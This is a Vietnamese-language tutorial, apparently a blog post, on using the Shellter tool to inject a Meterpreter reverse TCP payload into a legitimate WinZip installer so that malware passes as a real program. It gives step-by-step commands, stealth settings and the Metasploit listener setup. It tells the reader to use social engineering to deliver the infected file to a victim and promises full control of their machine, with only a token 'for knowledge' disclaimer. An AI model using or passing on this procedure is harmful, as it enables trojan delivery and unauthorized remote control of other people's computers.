Cách tiêm mã độc vào tệp exe bằng Shellter
Shellter là một công cụ chèn shellcode động được sử dụng để đưa tải trọng vào tệp thực thi (EXE) của Windows.
Việc tiêm này cho phép bạn ngụy trang một tải trọng hoặc mã độc hại thành một tệp thực thi thực sự. Để chứng minh kỹ thuật này, tôi sẽ đưa tải trọng của bộ đo TCP ngược vào một EXE.
Tệp vô hại này có thể là bất kỳ EXE nào, chẳng hạn như tệp CCleaner.exe hoặc tệp WinZip.exe. Như bạn có thể tưởng tượng, nếu bạn tìm ra phương pháp gửi tệp độc hại này cho một người thì có thể xâm phạm hệ thống của người đó mà không gặp nhiều khó khăn.
Cài đặt Shellter
Bạn có thể cài đặt Shellter bằng lệnh sau:
apt install shellter
Chạy Shellter
Shellter có thể được chạy bằng lệnh đầu cuối sau:
shellter
Bây giờ tôi đã sẵn sàng mọi thứ, tôi có thể đưa tải trọng vào trình cài đặt WinZip.
Công cụ sẽ cho phép lựa chọn giữa chế độ vận hành Tự động hoặc Thủ công. Tôi sẽ tiến hành với phương pháp Auto.
Shellter sau đó sẽ yêu cầu Mục tiêu PE hoặc đường dẫn đến tệp thực thi. Trong trường hợp của tôi, tôi sẽ trỏ công cụ tới tệp thực thi mà tôi đã tải xuống (winzip23-downwz.exe).
Sau đó, bạn được nhắc bật chế độ tàng hình. Nhập 'Y' để có.
Sau đó, nó yêu cầu bạn chọn tải trọng. Trong trường hợp của tôi, tôi đã chọn 1 cho Meterpreter_Reverse_TCP.
Sau đó, bạn được yêu cầu đặt LHOST và LPORT. Nhập IP máy chủ cục bộ và cổng cục bộ. Bạn có thể sử dụng lệnh ifconfig để tìm địa chỉ IP của mình.
Cuối cùng sau khi nhập địa chỉ và cổng, ứng dụng tiến hành lây nhiễm vào trình cài đặt.
Gửi tệp WinZip.exe đến máy của nạn nhân
Tại thời điểm này, tất cả những gì bạn phải làm là sử dụng các kỹ năng kỹ thuật xã hội của mình và gửi tệp 'winzip23-downwz.exe' cho nạn nhân. Vì vậy, hãy đặt trình nghe để ghi lại phiên khi nạn nhân chạy tệp.
Trong một thiết bị đầu cuối mới, hãy gõ msfconsole để khởi chạy khung Metasploit và thực hiện các lệnh sau:
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 8080
msf5> run
Từ đây, bạn có toàn quyền kiểm soát máy mục tiêu.
Lưu ý: Vui lòng biết rằng tất cả thông tin được sử dụng để mở rộng kiến thức chứ không phải để gây ra các cuộc tấn công nguy hiểm hoặc gây tổn hại.
Cảm ơn bạn đã đọc bài viết này!

![Dù sao thì một danh sách được liên kết là gì? [Phần 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































